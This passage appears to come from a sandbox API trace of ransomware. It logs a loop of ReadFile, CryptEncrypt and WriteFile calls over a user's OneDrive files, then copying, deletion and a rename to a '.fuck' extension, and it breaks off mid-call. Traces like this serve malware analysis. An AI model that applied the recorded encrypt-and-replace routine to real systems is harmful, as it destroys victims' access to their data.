pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.185] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.185] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.185] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.185] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.186] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.186] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.186] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.186] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.187] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.187] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.187] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.187] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.188] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.188] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.188] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.188] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.189] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.190] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.192] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.192] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.193] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.193] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.194] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.194] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.194] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.194] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.203] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif"), bFailIfExists=0) returned 1 [0270.217] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif", dwFileAttributes=0x0) returned 1 [0270.219] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif.gsg")) returned 1 [0270.223] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif.fuck")) returned 1 [0270.225] CryptDestroyHash (hHash=0x2fa608) returned 1 [0270.225] CryptDestroyKey (hKey=0x2fa648) returned 1 [0270.225] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.225] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.225] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.225] GetLastError () returned 0x0 [0270.225] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" (normalized: 